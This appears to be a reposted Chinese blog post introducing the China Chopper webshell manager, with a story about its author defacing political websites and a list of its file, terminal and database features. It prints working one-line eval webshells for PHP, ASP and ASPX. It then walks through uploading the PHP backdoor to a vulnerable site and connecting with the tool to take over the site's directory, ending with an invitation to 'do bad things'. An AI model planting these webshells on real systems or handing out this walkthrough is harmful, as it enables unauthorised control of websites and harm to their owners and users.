码迷,mamicode.com
首页 > 其他好文 > 详细

十大黑客工具之一——中国菜刀

时间:2020-01-05 11:45:56      阅读:444      评论:0      收藏:0      [点我收藏+]

标签:ade   str   简体中文   mss   中文   UNC   编译   pos   计算机语言   

中国菜刀的由来:

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。

技术图片

 

作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。

技术图片

 

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。

技术图片

 

主要功能有:文件管理,虚拟终端,数据库管理。

1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。

技术图片

 

什么是一句话木马?

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:

php:<?php @eval($_post[‘pass‘]);?>

asp:<%eval request ("pass")%>

aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 

一句话木马的使用

以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

技术图片

假设有个智障网站有这样的漏洞:

技术图片

 

我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”

技术图片

 

编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” 。

技术图片

 

在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了 。

技术图片

 

获取整个网站的目录,然后就可以开始做坏事了。

技术图片

十大黑客工具之一——中国菜刀

标签:ade   str   简体中文   mss   中文   UNC   编译   pos   计算机语言   

原文地址:https://www.cnblogs.com/longronglang/p/12151819.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!